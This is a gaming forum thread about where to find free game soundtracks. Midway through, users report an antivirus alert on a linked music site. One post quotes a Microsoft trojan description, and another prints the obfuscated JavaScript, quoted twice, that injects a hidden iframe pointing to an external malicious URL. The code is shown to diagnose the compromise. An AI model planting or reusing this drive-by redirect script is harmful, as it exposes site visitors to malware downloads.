Sign in to follow this  
Gben

Game Soundtracks for Free

2 questions:

- Was the soundtrack to C&C3 (& KW) ever released for free?

- Didn't someone re-edit the RA3 soundtracks without the click's at the end of the songs?

If you have links to either of those - that would be nice.

- Was the soundtrack to C&C3 (& KW) ever released for free?

TW soundtrack was only featured in the Kane Edition. KW only had 5 tracks.

- Didn't someone re-edit the RA3 soundtracks without the click's at the end of the songs?

What clicks? I have the RA3 Premier Edition with the soundtrack disc, no clicks spotted. But I might try to look for them...

There is a sharp 'click' at the start of every song.

There is a sharp 'click' at the start of every song.

Thanks for reminding me about that. It was quite a long while since I heard those tracks, and I can't believed I paid for the game with the tracks with bonus 'clicks'. Sigh.

Ah memories indeed... so I guess noone remembers who posted the unclicked versions. I can do it myself, I'm just lazy, and I thought the guy/gal did something else. Oh well. If I find it I will post it.

Oh my god... the full version of Cara Mia, without any distortion or elevator sounds. Awesome :D

btw, there seems to be a hidden link to a comic about turrets on that page ;)

FilePlanet also has a Warcraft II official MP3 pack. It's not the CD Audio soundtrack though, just MP3s that are identical to the MIDI files used in the DOS version of the game (identical in length but of higher quality of course), so some tracks are not included.

IIRC Blizzard also released a similar pack for Starcraft but I'm not sure if it's available anywhere now.

Interplay had released the CD soundtrack of Descent II but it's no longer available from their website. I've found a copy of it here.

Also, although this is not official, here's a site with high-qulaity records of MIDI soundtrack from DOS games made using an authentic Roland Sound Canvas:

Roland SC-55 Music Packs

The games currently featured include such well-known classics as Duke Nukem 3D, Descent and Rise of the Triad. Soundracks are available in MP3, OGG and/or FLAC formats.

MS security essentials comes up with a warning when I follow that link...

Yeah I can confirm that.....same warning for me as well. Its called Trojan:JS/Iframe.BT, screens and details below.

0fFng.png

9BpYq.png

http://www.microsoft...atid=2147659848

Trojan:JS/Iframe.BT

Encyclopaedia entry

Updated: Aug 30, 2012 | Published: Jul 31, 2012

Aliases

JS/IFrame.OA.gen (Command)

Trojan.JS.Iframe.BRK (BitDefender)

Alert Level

Severe

Antimalware protection details

Microsoft recommends that you download the latest definitions to get protected.

Detection last updated:

Definition: 1.131.1638.0

Released: Aug 08, 2012 Detection initially created:

Definition: 1.131.1058.0

Released: Jul 31, 2012

Summary

Trojan:JS/Iframe.BT is a detection for a trojan that redirects your browser to other sites. These sites may attempt to download and install malware onto your computer, often by exploiting software vulnerabilities.

Make sure you install all available updates for your computer to help prevent the downloading of additional malware. For more information on updating software, including Java, Adobe and Microsoft products, please see the Additional information section in this entry.

This trojan is a malicious Javascript file that creates a hidden IFrame. The Javascript file is embedded into compromised webpages, usually via SQL injection or through Blackhat search engine optimization (SEO) poisoning.

Symptoms

There are no common symptoms associated with this threat - links are activated within IFrames while viewing web content on modified pages. Alert notifications from installed antivirus software when your browser is redirected may be the only symptoms.

That's strange. When I went to that website, I got no warning from my browser or my Norton Internet Security saying of a site threat. I believe MS Security Essentials may have spotted a false positive threat.

Norton is a pile of garbage. The site does have a malicious ofuscated iframe embedded on it.

<script type="text/javascript">
var url="http://www.isarapost.net/featured-content-slider/images/template.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}
</script>

The site might have been hacked.

I don't know the purpose of it though.

Edited by Tore

Yeah well i cant believe i actually pre-prdred Frank;s sound track. Also, The C&C Ultimate soundtrack was supurb. Great Job EA. As for the free tracks, I took the liberty of extracting them from my cnc mix files as well as big files from generals

As for the free tracks, I took the liberty of extracting them from my cnc mix files as well as big files from generals

But they're not as hi-quality as their originals on Klepacki's website.

Norton is a pile of garbage. The site does have a malicious ofuscated iframe embedded on it.

<script type="text/javascript">
var url="http://www.isarapost.net/featured-content-slider/images/template.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}
</script>

The site might have been hacked.

I don't know the purpose of it though.

The site's author is aware of the problem, and takes steps to prevent that:

Ughh...not again. I really don't know what's causing this. It happens over and over again. I don't know what to do about it but keep cleaning it whenever it comes up again.

Your computer must have gotten compromised at some point or might still be; I reset your password and the contents of your FTP. I'll send you the new password as a PM.

Well, I'll have to reupload all the music packs which will take a while. Sorry, guys.

Just adding the "Twisted Insurrection Soundtrack" to the list for posterity, even though it's in this month's news section.

If you want to download a copy of this soundtrack visit the Twisted Insurrection site.

I'm enjoying some of the TRON-Legacy-like sounds right now.

Just adding the "Twisted Insurrection Soundtrack" to the list for posterity, even though it's in this month's news section.

I'm enjoying some of the TRON-Legacy-like sounds right now.

Post War Melancholy track FTW!

Hmm, I've been browsing Westwood's FTP, and while I never bothered downloading audio previews from there before I decided to do that now, and I think there are some noteworthy things.

First off, the WAV/AU files for the games that actually have MIDI music are interesting in and of themselves (there are a few complete tunes from each game). Moreover, if you take, for example, Dune II and check out the file called d2intro2.wav (the "2" in the file name just indicates it's the full version, and not the shorter preview of the tune), this is actually not the music that plays in the Dune II intro movie at all. Similarly, one can learn that another tune was associated with House Ordos, and yet another is titled Revenge (this theme eventually became the basis for Dune 2000's Attack on Arrakis).

With C&C, the files called actonit1.wav and actonit2.wav (which are the short and the full versions respectively) are not Act on Instinct as one could have thought but Just Do It Up! instead. Also the actual Act on Instinct, instinct.mp3, seems to be a bit different from the version at Frank K's website (or maybe from the OST CD version; I'm not entirely sure about this one).

As you guys probably know, the preview theme in the Tiberian Sun folder, Stomp, is never used in that game; it was later "recycled" in Renegade.

Some of the MP3 files for later games are of pretty high quality - up to 160 kbit/s at 44 kHz.

The soundtracks for each game are far from complete of course but it's still pretty interesting.

Plokite - I've never played any of those games? What sort of music is it (I guess I mean the sport games mainly)?

I didn't know EA has a sports game named after current Duke coach Mike Krzyzewski.

Edited by zocom7